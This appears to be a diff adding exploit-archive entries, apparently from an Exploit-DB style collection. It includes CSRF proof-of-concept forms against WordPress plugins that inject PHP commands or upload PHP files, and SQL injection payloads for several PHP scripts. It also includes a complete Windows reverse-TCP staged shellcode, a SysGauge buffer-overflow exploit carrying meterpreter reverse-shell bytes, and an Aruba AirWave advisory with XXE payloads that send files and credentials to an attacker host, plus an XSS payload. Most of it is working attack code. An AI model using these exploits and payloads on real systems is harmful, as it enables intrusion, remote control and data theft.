 http://yourhost/wp-admin/admin.php?page=nsp_main
 http://yourhost/wp-admin/admin.php?page=nsp_visits
--- a/platforms/php/webapps/41487.html
+++ b/platforms/php/webapps/41487.html
@ -0,0 +1,46 @@
 <!--
 Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html
 Abstract
 It was discovered that the Global Content Blocks WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.
 Contact
 For feedback or questions about this advisory mail us at sumofpwn at securify.nl
 The Summer of Pwnage
 This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
 OVE ID
 OVE-20160712-0031
 Tested versions
 This issue was successfully tested on Global Content Blocks WordPress Plugin version 2.1.5.
 Fix
 There is currently no fix available.
 Introduction
 The Global Content Blocks WordPress Plugin lets users create their own shortcodes to insert reusable code snippets, PHP or HTML including forms, opt-in boxes, iframes, Adsense code, etc, into pages and posts as well as widgets and directly into php content. Global Content Blocks is affected by Cross-Site Request Forgery. Amongst others, this issue can be used to update a content block to overwrite it with arbitrary PHP code. Visiting a page or blog post that uses this content block will cause the attacker's PHP code to be executed.
 Details
 The issue exists due to the fact that Global Content Blocks does not use the Cross-Site Request Forgery protection provided by WordPress. Actions with Global Content Blocks have a predictable format, thus an attacker can forge a request that can be executed by a logged in Administrator. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
 Proof of concept
 The following proof of concept will update/overwrite the content block with id 1. In order to run the attacker's PHP code, a page/blog needs to be viewed that contains this content block (eg, [contentblock id=1]).
 -->
 <html>
   <body>
      <form action="http://<target>/wp-admin/options-general.php?page=global-content-blocks" method="POST">
         <input type="hidden" name="gcb_view" value="update" />
         <input type="hidden" name="update_it" value="1" />
         <input type="hidden" name="gcb_name" value="Foo" />
         <input type="hidden" name="gcb_custom_id" value="" />
         <input type="hidden" name="gcb_type" value="php" />
         <input type="hidden" name="gcb_description" value="" />
         <input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
         <input type="hidden" name="gcb_updateshortcode" value="Update" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
 </html>
--- a/platforms/php/webapps/41488.html
+++ b/platforms/php/webapps/41488.html
@ -0,0 +1,68 @@
 <!--
 Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_file_manager_wordpress_plugin.html
 Abstract
 A Cross-Site Request Forgery (CSRF) vulnerability was found in the File Manager WordPress Plugin. Among others, this issue can be used to upload arbitrary PHP files to the server.
 Contact
 For feedback or questions about this advisory mail us at sumofpwn at securify.nl
 The Summer of Pwnage
 This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
 OVE ID
 OVE-20160712-0029
 Tested versions
 This issue was successfully tested on the File Manager WordPress Plugin version 3.0.1.
 Fix
 There is currently no fix available.
 Introduction
 The File Manager WordPress Plugin is a file manager for WordPress which can be used to upload, delete, copy, move, rename, archive and extract files without the need for FTP. It was discovered that the File Manager WordPress Plugin is vulnerable to Cross-Site Request Forgery.
 Details
 The upload form used by the plugin has no protection against CSRF attacks. As a result an attacker can for example upload arbitrary PHP files to the server.
 Please note that the target user needs to be logged in.
 Proof of concept
 The target parameter holds a Base64-encoded destination path. By using the proof of concept request below a file named info.php is uploaded to the /wp-content/uploads/file-manager/ directory.
 When uploaded, this file can be requested from the outside as follows:
 http://<wp-server>/wp-content/uploads/file-manager/info.php
 Request:
 -->
 POST /wp-admin/admin-ajax.php HTTP/1.1
 Host: <wp-server>
 Cookie: ALL_YOUR_WP_COOKIES
 Connection: close
 Content-Type: multipart/form-data; boundary=---------------------------6427194103423794601262893907
 -----------------------------6427194103423794601262893907
 Content-Disposition: form-data; name="cmd"
 upload
 -----------------------------6427194103423794601262893907
 Content-Disposition: form-data; name="target"
 l1_d3AtY29udGVudC91cGxvYWRzL2ZpbGUtbWFuYWdlcg
 -----------------------------6427194103423794601262893907
 Content-Disposition: form-data; name="suffix"
 ~
 -----------------------------6427194103423794601262893907
 Content-Disposition: form-data; name="action"
 connector
 -----------------------------6427194103423794601262893907
 Content-Disposition: form-data; name="upload[]"; filename="info.php"
 Content-Type: text/php
 <?php
 phpinfo();
 ?>
 -----------------------------6427194103423794601262893907--
--- a/platforms/php/webapps/41489.txt
+++ b/platforms/php/webapps/41489.txt
@ -0,0 +1,20 @@
 # # # # # 
 # Exploit Title: SchoolDir - SQL Injection
 # Google Dork: N/A
 # Date: 01.03.2017
 # Vendor Homepage: http://www.brynamics.xyz/
 # Software: https://codecanyon.net/item/schooldir/19326269
 # Demo: http://www.brynamics.xyz/schooldir/
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/search?searchItem=[SQL]&criteria=schools
 # http://localhost/[PATH]/sortsearch?School_type=[SQL]&fees=2&ownership=federal&location=Nigeria&searchItem=Harvard+University&criteria=schools
 # If you don't know to use the vulnerabilities, you don't need to check it.
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41490.txt
+++ b/platforms/php/webapps/41490.txt
@ -0,0 +1,21 @@
 # # # # # 
 # Exploit Title: Rage Faces Script v1.3 - SQL Injection
 # Google Dork: N/A
 # Date: 01.03.2017
 # Vendor Homepage: http://www.memesoftware.com/
 # Software: http://www.memesoftware.com/ragefaces.php
 # Demo: http://ragefaces.memesoftware.com/
 # Version: 1.3
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/face.php?face=[SQL]
 -2')+/*!50000union*/+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5-- -
 # http://localhost/[PATH]/create.php?create=[SQL]
 -1'+/*!50000union*/+Select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9-- -
 # Etc... 
 # # # # #
--- a/platforms/php/webapps/41491.txt
+++ b/platforms/php/webapps/41491.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Meme Maker Script 2.1 - SQL Injection
 # Google Dork: N/A
 # Date: 01.03.2017
 # Vendor Homepage: http://www.memesoftware.com/
 # Software: http://www.memesoftware.com/mememaker.php
 # Demo: http://www.memefaces.me/
 # Version: 2.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/profil.php?user=[SQL]
 # -2'+/*!50000union*/+select+1,2,3,4,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),6,7-- -
 # Etc...
 # # # # #
--- a/platforms/win_x86/shellcode/41481.asm
+++ b/platforms/win_x86/shellcode/41481.asm
@ -0,0 +1,344 @@
 ########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
            ########### Author: Snir Levi, Applitects #############
 								## 332 Bytes ##
 					## For Educational Purposes Only ##
 Date: 01.03.17
 Author: Snir Levi
 Email: snircontact@gmail.com
 https://github.com/snir-levi/
 IP -    127.0.0.1
 PORT -  4444     
 Tested on:
 Windows 7
 Windows 10
 											###Usage###
 				Victim Executes the first stage shellcode, and opens tcp connection
 				After Connection is established, send the Alphanumeric stage to the connection		
 				nc -lvp 4444
 				connect to [127.0.0.1] from localhost [127.0.0.1] (port)
 				RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
 				Microsoft Windows [Version 10.0.14393]
 				(c) 2016 Microsoft Corporation. All rights reserved.
 				C:\Users\>
 											###########
 ##Shellcode##
 #### Second Stage Alphanumeric shellcode: #####
 RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
 R		push edx
 P		push eax 
 hoces 	push 0x7365636f //oces
 htePr	push 0x72506574	//tePr
 hCrea	push 0x61657243	//Crea
 T		push esp
 Q		push ecx
 PX		will be replaced with call [esi] (0x16ff)
 L*8		dec esp // offset esp to kernel32.dll Address
 Y		pop ecx // ecx = kernel32
 F*4		inc esi -> offset [esi+4]
 PX		will be replaced with mov [esi],eax (0x0689)
 N*4		dec esi -> offset [esi]
 j0		push 0x30
 X		pop eax
 H*48	dec eax  // zeroing eax
 P		push eax
 hessA	push 0x41737365 //essA (will be null terminated)
 hProc	push 0x636f7250 //Proc
 hExit	push 0x74697845	//Exit
 T		push esp
 Q		push ecx
 PX		will be replaced with call [esi] (0x16ff)
 F*8		inc esi -> offset [esi+8]
 PX		will be replaced with mov [esi],eax (0x0689)
 Z*10	offset stack to &processinfo
 j0		push 0x30
 Y		pop ecx
 I*48	dec ecx  // zeroing ecx
 T		push esp
 X		pop eax	 //eax = &PROCESS_INFORMATION
 Q*4		push ecx //sub esp,16
 W		push edi
 W		push edi
 W		push edi
 Q		push ecx
 Q		push ecx
 B		inc edx
 R		push edx
 Q*10 	push ecx
 jD		push 0x44
 T		push esp
 Z		pop edx  //edx = &STARTUPINFOA
 hexeC	push 0x65
 hcmd.	push 0x78652e64
 T		push esp // &'cmd.exe'
 Y		pop ecx
 P		push eax // &PROCESS_INFORMATION
 R		push edx // &STARTUPINFOA
 j0		push 0x30
 Z		pop edx
 J*48	dec edx // zeroing edx
 R*3		push edx
 B		inc edx
 R		push edx
 J		dec edx
 R*2		push edx
 Q		push ecx ; &'cmd.exe'
 R		push edx
 A*7		inc ecx	//offset ecx to [C]exeh -> will be null terminated
 N*4		dec esi //offset [esi+4] to CreateProccesA
 S		push ebx ; return address
 ## First Stage Shellcode ##
 global _start
 section .text
 _start:
 	xor eax,eax
 	push eax ; null terminator for createProcA
 	mov eax,[fs:eax+0x30] ; Proccess Enviroment Block
 	mov eax,[eax+0xc]
 	mov esi,[eax+0x14]
 	lodsd
 	xchg esi,eax
 	lodsd
 	mov ebx,[eax+0x10] ; kernel32
 	mov ecx,[ebx+0x3c] ; DOS->elf_anew
 	add ecx, ebx; Skip to PE start
 	mov ecx, [ecx+0x78] ; offset to export table
 	add ecx,ebx ; kernel32 image_export_dir
 	mov esi,[ecx+0x20] ; Name Table
 	add esi,ebx
 	xor edx,edx
 	getProcAddress:
 		inc edx
 		lodsd
 		add eax,ebx
 		cmp dword [eax],'GetP'
 		jne getProcAddress
 		cmp dword [eax+4],'rocA'
 		jne getProcAddress
 	;---Function Adresses Chain----
 	;[esi]		GetProcAddress
 	;[esi+12]	WSAstartup
 	;[esi+16]	WSASocketA
 	;[esi+20]	connect
 	;[esi+24]	recv
 	;[esi+28]	kernel32
 	;Alphanumeric stage store:
 	;[esi+4]	CreateProcessA
 	;[esi+8]	ExitProccess
 	mov esi,[ecx+0x1c] ; Functions Addresses Chain
 	add esi,ebx
 	mov edx,[esi+edx*4]
 	add edx,ebx ; GetProcAddress
 	sub esp, 32 ; Buffer for the function addresses chain
 	push esp
 	pop esi
 	mov [esp],edx ; esi offset 0 -> GetProcAddress
 	mov [esi+28],ebx ;esi offset 28 -> kernel32
 	;--------winsock2.dll Address--------------
 	xor edi,edi
 	push edi
 	push 0x41797261 ; Ayra
 	push 0x7262694c ; rbiL
 	push 0x64616f4c ; daoL
 	push esp
 	push ebx
 	call [esi]
 	;-----ws2_32.dll Address-------
 	xor ecx,ecx
 	push ecx
 	mov cx, 0x3233   ; 0023 
 	push ecx
 	push 0x5f327377  ; _2sw
 	push esp
 	call eax
 	mov ebp,eax ;ebp = ws2_32.dll
 	;-------WSAstartup Address-------------
 	xor ecx,ecx
 	push ecx
 	mov cx, 0x7075      ; 00up
    push ecx
    push 0x74726174     ; trat
    push 0x53415357     ; SASW
 	push esp
 	push ebp
 	call [esi]
 	mov [esi+12],eax ;esi offset 12 -> WSAstartup
 	;-------WSASocketA Address-------------
 	xor ecx,ecx
 	push ecx
 	mov cx, 0x4174 ; 00At
 	push ecx
 	push 0x656b636f ; ekco
 	push 0x53415357 ; SASW
 	push esp
 	push ebp
 	call [esi]
 	mov [esi+16],eax;esi offset 16 -> WSASocketA
 	;------connect Address-----------
 	push edi
 	mov ecx, 0x74636565 ; '\0tce'
 	shr ecx, 8
 	push ecx
 	push 0x6e6e6f63     ; 'nnoc'
 	push esp
 	push ebp
 	call [esi]
 	mov [esi+20],eax;esi offset 20 -> connect
 	;------recv Address-------------
 	push edi
 	push 0x76636572 ;vcer
 	push esp
 	push ebp
 	call [esi]
 	mov [esi+24],eax;esi offset 24 -> recv
 	;------call WSAstartup()----------
 	xor ecx,ecx
 	sub sp,700
 	push esp
 	mov cx,514
 	push ecx
 	call [esi+12]
 	;--------call WSASocket()-----------
 	; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
 	; IPPROTO_TCP = 6, NULL,
 	;(unsigned int)NULL, (unsigned int)NULL);
 	push eax ; if successful, eax = 0
 	push eax
 	push eax
 	mov al,6
 	push eax
 	mov al,1
 	push eax
 	inc eax
 	push eax
 	call [esi+16]
 	xchg eax, edi	; edi = SocketRefernce
 	;--------call connect----------
 	;struct sockaddr_in {
    ;   short   sin_family;
    ;   u_short sin_port;
    ;   struct  in_addr sin_addr;
    ;   char    sin_zero[8];
 	;};
 	push byte 0x1
    pop edx
    shl edx, 24
    mov dl, 0x7f    ;edx = 127.0.0.1 (hex)
 	push edx
 	push word 0x5c11; port 4444
 	push word 0x2
 	;int connect(
 	;_In_ SOCKET                s,
 	;_In_ const struct sockaddr *name,
 	;_In_ int                   namelen
 	;);	
 	mov edx,esp
 	push byte 16 ; sizeof(sockaddr)
 	push edx ; (sockaddr*)
 	push edi ; socketReference
 	call [esi+20]
 	;--------call recv()----------
 	;int recv(
 	;_In_  SOCKET s,
 	;_Out_ char   *buf,
 	;_In_  int    len,
 	;_In_  int    flags
 	;);
 stage:
 	push eax
 	mov ax,950
 	push eax	;buffer length
 	push esp 
 	pop ebp
 	sub ebp,eax ; set buffer to [esp-950]
 	push ebp	;&buf
 	push edi	;socketReference
 	call [esi+24]
 executeStage:
 	xor edx,edx
 	mov byte [ebp+eax-1],0xc3	; end of the Alphanumeric buffer -> ret
 	mov byte [ebp+96],dl ; null terminator to ExitProcess
 	mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
 	dec ebp
 	mov word [ebp+20],0x16ff ; call DWORD [esi]
 	mov word [ebp+35],0x0689 ; mov [esi],eax
 	mov word [ebp+110],0x16ff; call DWORD [esi]
 	mov word [ebp+120],0x0689; mov [esi],eax
 	mov ax,0x4173 ; As (CreateProcessA)
 	mov ecx,[esi+28] ; ecx = kernel32
 	dec dl ;edx = 0x000000ff
 	call ebp ; Execute Alphanumeric stage
 executeShell:
 	mov [ecx],dl	;null terminator to 'cmd.exe'
 	call dword [esi] ;createProcA 
 	push eax
 	call dword [esi+4] ; ExitProccess
 	-----------------------
 unsigned char shellcode[]=
 "\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";
--- a/platforms/windows/remote/41479.py
+++ b/platforms/windows/remote/41479.py
@ -0,0 +1,69 @@
 # Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution
 # Date: 2017-02-28
 # Exploit Author: Peter Baris
 # Vendor Homepage: http://www.saptech-erp.com.au
 # Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
 # Version: 1.5.18
 # Tested on: Windows Server 2008 R2 Standard x64
 # CVE : requested
 # The shellcode has to be split into 2 pieces  for the exploit to work and has to be placed at the offsets like shown below.
 # The 1st part can be max. 236 bytes 
 # The 2nd part can be max. 76  (leave at least 4 NOPs)
 import socket
 # QtGui4.dll 0x6527635E - CALL ESP
 jmp = "\x5e\x63\x27\x65"
 nops = "\x90"*8
 # reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20 
 #IP: 192.168.198.128, PORT: 4444
 # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
 rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
 "\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
 "\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
 "\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
 "\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
 "\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
 "\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
 "\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
 "\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
 "\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
 "\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
 "\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
 "\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
 "\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
 "\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
 "\xc1\x48\x45\x0e\x32\x6b\x4c")
 rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
 "\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
 "\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
 "\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
 "\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
 "\xe2\x79\xdc\x2d\x97\x97")
 buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
 port = 25
 s = socket.socket()
 ip = '0.0.0.0'             
 s.bind((ip, port))            
 s.listen(5)                    
 print 'Listening on SMTP port: '+str(port)
 print(len(rev_met_1))
 print(len(rev_met_2))
 while True:
 	conn, addr = s.accept()     
 	conn.send('220 '+buffer+'ESMTP Sendmail \r\n')
 	conn.close()
--- a/platforms/xml/webapps/41482.txt
+++ b/platforms/xml/webapps/41482.txt
@ -0,0 +1,226 @@
 SEC Consult Vulnerability Lab Security Advisory < 20170301-0 >
 =======================================================================
              title: XML External Entity Injection (XXE),
                     Reflected Cross Site Scripting
            product: Aruba AirWave
 vulnerable version: <=8.2.3
      fixed version: 8.2.3.1
         CVE number: CVE-2016-8526, CVE-2016-8527
             impact: high
           homepage: http://www.arubanetworks.com/
              found: 2016-11-21
                 by: P. Morimoto (Office Bangkok)
                     SEC Consult Vulnerability Lab 
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
 =======================================================================
 Vendor description:
 -------------------
 "Aruba, a Hewlett Packard Enterprise company, (formerly "Aruba Networks, Inc.")
 is a networking vendor selling enterprise wireless LAN and edge access
 networking equipment. The company has over 1,800 employees and is
 headquartered in Sunnyvale, California. Aruba's core products are access points
 (APs), mobility controllers, and network management software through their
 Airwave Management Platform product."
 Source: https://en.wikipedia.org/wiki/Aruba_Networks
 Business recommendation:
 ------------------------
 SEC Consult recommends not to use the product in a production environment
 until a thorough security review has been performed by security professionals
 and all identified issues have been resolved.
 Vulnerability overview/description:
 -----------------------------------
 1) XML External Entity Injection (CVE-2016-8526)
 The used XML parser is resolving external XML entities which allows attackers
 to read files and send requests to systems on the internal network (e.g port
 scanning). 
 The vulnerability can be exploited by a low privileged read-only user 
 to read sensitive information / files with malicious XML code.
 Note that as Aruba's passwords are encrypted with a shared static key, 
 privilege escalation to admin role is also possible!
 Multiple different functions are affected by XXE.
 According to the vendor another researcher has also found one of the XXE issues, hence
 credits go to them as well.
 Vendor: "Although the team hasn't reproduced this yet, I’ve had other reports
 come in through our bug bounty program last month about XXE issues in VisualRF.
 One of the issues you reported is the same, and you reported three others that we
 haven't seen yet."
 2) Reflected Cross Site Scripting (CVE-2016-8527)
 Due to the lack of input validation, an attacker can insert malicious JavaScript
 code to be executed under a victim's browser context. 
 Proof of concept:
 -----------------
 1) XML External Entity Injection (CVE-2016-8526)
 a) XXE in VisualRF Backup Sites
 Login as any user role (including read-only/standard user) 
 Navigate to VisualRF > Floor Plans > Select 'View' under 'Network' section.
 Select a campus (e.g. Default Campus) > Select 'Edit' > 
 Select action 'Export Floor Plans' > Ok
 POST /visualrf/backup_sites HTTP/1.1
 Host: <AirWaveHost>
 [...]
 xml=<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY %25 foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1">%26%65%78%66%69%6c%3b</visualrf:sites>
 $ cat sectest.dtd
 <!ENTITY % data SYSTEM "file:///<removed>">
 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>">
 $ python -m SimpleHTTPServer 1234
 $ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
 $ ruby xxe-ftp-server.rb
 FTP. New client connected
 < USER anonymous
 < PASS Java1.8.0_102@
 > 230 more data please!
 < TYPE I
 > 230 more data please!
 < CWD [General]
 [...]
 < ; set global WLC credentials
 > 230 more data please!
 < wlc_user: <username>
 > 230 more data please!
 < wlc_pasw: <password>
 [...]
 b) XXE in Visual RF Site Restore 
 $ cat version.xml
   <?xml version="1.0" encoding="UTF-8" standalone="no"?>
   <!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/version.dtd">%foo;%param1;]>
   &exfil;<backup backup-time="Mon Nov 21 14:44:41 CET 2016" build="${svn.build}" plan-mode="false" version="8.0.0"/>
 $ zip backup_sectest.zip version.xml
  adding: version.xml (deflated 16%)
 And then just upload the backup_sectest.zip via the restore functionality.
 POST /nf/visualrf_siterestore HTTP/1.1
 Host: <AirWaveHost>
 [...]
 ------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
 Content-Disposition: form-data; name="zip"; filename="backup_sectest.zip"
 Content-Type: application/zip
 [.. backup_sectest.zip ..]
 ------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
 Content-Disposition: form-data; name="import"
 Import
 ------WebKitFormBoundaryjPK7DdVbiNVDEJ2A--
 c) XXE in Visual RF Verify
 POST /visualrf/verify/<Site-ID> HTTP/1.1
 Host: <AirWaveHost>
 [...]
 <?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%foo;%param1;]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1"><site 
 [...]
 />&exfil;</site></visualrf:sites>
 2) Reflected Cross Site Scripting (CVE-2016-8527)
 Note that the XSS payload can be used with either HTTP parameter 'start' or 'end'.
 GET /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match HTTP/1.1
 Host: <AirWaveHost>
 [...]
 HTTP/1.1 200 OK
 [...]
 <?xml version='1.0' encoding='UTF-8' standalone='yes'?>
 <results>
  <error>For input string: "<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'/></a>"</error>
 </results>
 Vulnerable / tested versions:
 -----------------------------
 The following versions are affected by the identified vulnerabilities which 
 were the most recent versions at the time of discovery:
 Aruba AirWave version <8.2.3.1
 Vendor contact timeline:
 ------------------------
 2016-11-23: Contacting vendor through aruba-sirt@hpe.com
 2016-11-23: Vendor: Established communication over encrypted channel and asked
            for extending the disclosure date due to the upcoming holidays
 2017-01-18: CVE-2016-8526 was assigned for the XXE issue, and CVE-2016-8527 for
            the reflected XSS issue.
 2017-02-21: Aruba AirWave 8.2.3.1 was released.
 2017-03-01: Coordinated disclosure of the security advisory. 
 Solution:
 ---------
 Update to version 8.2.3.1 or later.
 http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
 https://support.arubanetworks.com/Documentation/tabid/77/DMXModule/512/EntryId/23738/Default.aspx
 Workaround:
 -----------
 None
 Advisory URL:
 -------------
 https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 SEC Consult Vulnerability Lab
 SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
 About SEC Consult Vulnerability Lab
 The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
 ensures the continued knowledge gain of SEC Consult in the field of network
 and application security to stay ahead of the attacker. The SEC Consult
 Vulnerability Lab supports high-quality penetration testing and the evaluation
